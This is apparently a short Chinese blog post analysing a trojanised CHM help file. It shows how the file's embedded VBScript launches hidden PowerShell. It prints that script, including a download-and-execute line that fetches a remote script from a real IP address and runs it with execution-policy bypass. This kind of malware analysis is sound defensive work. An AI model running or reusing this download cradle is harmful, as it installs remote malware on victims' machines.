chm木马分析

文件sha1:6d4415a2cbedc960c7c7055626c61842b3a3ca4718e2ac0e3d2ac0c7ef41b84d

打开这个chm文件,如下图所示,没发现可疑的地方。

图片说明

用火绒剑监控时发现调用了mshta执行vbs脚本然后调用powershell。

图片说明

chm不是可执行程序,是一个打包格式,里面包含了各类资源。我们可以用7z解压。

图片说明

发现在iOS_App_Development.htm文件中嵌入了vbs脚本

1
2
3
4
5
vbscript:Execute("Dim shell,command:command = "
"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -Command
IEX (New-Object Net.WebClient).DownloadString(*http://92.222.106.229/theme.gif*)"
":command=Replace(command,""*"",Chr(39)):
set shell = CreateObject(""WScript.Shell""):shell.Run command,0:close")'
图片说明

theme.gif是一段powershell脚本。

文章目录
|